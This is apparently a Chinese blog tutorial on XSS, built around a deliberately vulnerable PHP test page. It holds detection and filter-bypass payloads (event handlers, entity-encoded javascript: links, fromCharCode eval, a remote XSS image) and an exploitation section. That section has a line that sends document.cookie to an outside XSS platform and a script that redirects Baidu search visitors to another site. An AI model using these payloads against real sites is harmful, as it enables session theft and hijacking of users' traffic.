Xss详解之检测,绕过,利用

1.实验环境搭建

phpstudy
网站根目录(jsAttack.php)源码:

<?php
echo 'hello';
echo $_GET['name'];
setcookie("TestCookie", "test");
?>

网站功能:根据用户输入的name,返回一个hello +用户输入。

2.xss漏洞成因

后台未对用户输入进行检查,直接把用户输入返回至前端。导致javascript代码在客户端任意执行。

从xss的成因可以看到,xss攻击对象是客户端(恶意代码是在客户端执行的)。并且理论上前端javascript可以实现的功能,xss都可以在客户端实现,像获取cookie,记录键盘等。

3.xss分类

结合图5.1.1查看

3.1反射型

经过后端,不经过数据库

3.2存储型

经过后端,经过数据库

3.3dom型

不经过后端,DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞,dom - xss是通过url传入参数去控制触发的。

小结:两点区分三类。1.是否经过后端。2.是框里,还是url里的参数。第一类和第三类其实差不不大(个人觉得)。

4.XSS检测及绕过

(1)后台未对输入进行任何处理

检测代码
"><script>alert("xss")</script>

(2)后台对输入进行了过滤,含有script关键字时,替换成空。

(这条代码的意思是,把oldVar里的"script"替换成"")
后台过滤代码:$newVar = preg_replace("/script/", "", $oldVar);
检测手段:
<scrscriptipt>alert("XSS")</scrscriptipt>
检测结果:

检测结果

(3)进行了过滤,当含有script关键字时,直接返回空

后台过滤代码:

keywords="script";
if(preg_match("/$keywords/i",$data)){
  return;
 }else{http://192.168.7.119:8000/zc-detail/12/#user-profile-info
  return $data;
 } 
检测结果

(4)针对script关键字的过滤,有以下绕过姿势

1.JavaScript 事件

<div οnmοuseenter="alert('xss')">
<div onclick ="alert('xss')">
<button type="button" onclick="alert('xss')>Click Me!</button>
<input type = "button"  value = "clickme" onclick="alert('click me');" />
<img src="images/logo.png" onerror="alert('xss')"/>

检测结果


检测结果

2.行内样式(Inlinestyle)

<div style="color: expression(alert('XSS'))">
<div style="color: '<'; color: expression(alert('XSS'))">

经过测试,当ie开启兼容性设置时,这种方法才有效。不具备普遍性。

3.Javascript URL和html字符编码

<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">link</a>

<a href="java&#115;cript:alert('xss')">link</a>

检测结果

编码绕过

绕过原理:
当浏览器接受到一份HTML代码后,会对标签之间(<p>xxx</p>等,<script>除外)、标签的属性中(<a href='xxxx'>)进行实体字符(其实就是html编码)解码变为相应的字符。利用这个,由可以进行一次绕过。
注意:如果请求的参数是在url中,需要先对测试代码进行一个url编码

(5)空格/回车/Tab绕过(测试一下,是无法绕过的,不过好多博客上都写可以绕过javascript关键字。)

<img src= "java  script:alert('xss');" width=100>

(6)绕过magic_quotes_gpc(针对',",\关键字的绕过)

magic_quotes_gpc=ON是php中的安全设置,开启后会把一些特殊字符进行轮换,比如’(单引号)转换为\’,”(双引号)转换为\”,\转换为\

6.1可以充分利用字符编码

<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88,83, 83, 34, 41, 59))</script>

6.2利用远程xss图片

<img sRC=https://xsshs.cn/IGCz/xss.jpg>
如何生成这种xss图片的原理,参考链接
图片xss的利用方法
不想了解原理,可以直接通过xss平台生成。

绕过小结:不断测试,猜测后台对哪些关键字进行了过滤处理,和处理方式。如果后台只对script,',",\进行了过滤处理,理论上是可以成功绕过的。至于后台对<,>进行了过滤处理,怎么绕过我暂时不清楚,欢迎大家脑洞。用以下代码测试,如果没有问题,基本上就不存在着xss(最后一条代码的src指向一个包含js脚本的图片)

<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88,83, 83, 34, 41, 59))</script>
<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">link</a>
<img src="images/logo.png" onerror="alert('xss')"/>
<img sRC=https://xsshs.cn/IGCz/xss.jpg>

5.XSS平台

5.1xss攻击过程

下图是xss攻击的全过程图。
可以分为三个部分:攻击者,存在xss漏洞的web服务端,被攻击用户。


一次完整的XSS攻击全过程,图5.1.1

xss平台的用处当然不只是简单的收集数据,它还可以帮助攻击者生成各种功能的恶意js代码,如记录键盘,定位,获取页面源码等功能。由于各种功能的恶意代码过长,一般是通过js远程引入(javascript是可以远程引入js代码并执行的)
如下图,xss平台提供一些常用的恶意js脚本(公共模块),同时你也可以编写自己的恶意模块(我的模块)。使用xss的公共模块很简单,新建一个项目,之后会有一个如何使用(就是把那段生成的代码,贴在有xss的地方),傻瓜式操作。


一个简单的xss平台

5.2窃取cookie

这里只测了一下基本功能窃取cookie,成功了。
关键代码
'https://xsshs.cn/xss.php?do=keepsession&id=IGCz&url='+escape(document.location)+'&cookie='+escape(document.cookie)
这段代码的意思是将document.cookie,以参数cookie提交到xss平台。

本地实验后,成功窃取到本地的cookie

5.3劫持搜索引擎

搜索引擎劫持我试着弄了一下,成功劫持跳转(原来是抓包改referrer,但是没有跳转,原因暂时不清楚。之后是在本地做了一个baidu.php的页面做跳转才成功)。模块代码很简单,如下:
var slyar=document.referrer;if(slyar.indexOf("baidu")>0)self.location="https://xsshs.cn";
这句话的意思是,如果是从百度跳转过来的,就重定向到我这个xss平台(从百度搜索引擎跳转到的网页,referrer 一般都是类似这种格式的https://eclick.baidu.com/fp.htm?br=2&fp=92D9C905D35768DCA250B8B72860337D&fp2=FC91
所以当用户是从百度的搜索引擎跳转过来的时候,会直接重定向到别的而已网站。换句话说,花钱买的百度搜索引擎排名,结果跳转到的却是别人的网站。

xss平台总结:理论上,js代码在前端能实现的功能,xss攻击都可以实现,比如页面跳转,记录键盘等。像搜索引擎劫持就是一个利用xss很好的例子。所以可以尽情发挥自己脑洞,编写一些自己的模块,漏洞的利用也是一个很好玩的东西。ps:xss蠕虫,有兴趣了解一下。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 219,589评论 6 508
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 93,615评论 3 396
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 165,933评论 0 356
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,976评论 1 295
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,999评论 6 393
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,775评论 1 307
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,474评论 3 420
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,359评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,854评论 1 317
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 38,007评论 3 338
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,146评论 1 351
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,826评论 5 346
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,484评论 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,029评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,153评论 1 272
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,420评论 3 373
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,107评论 2 356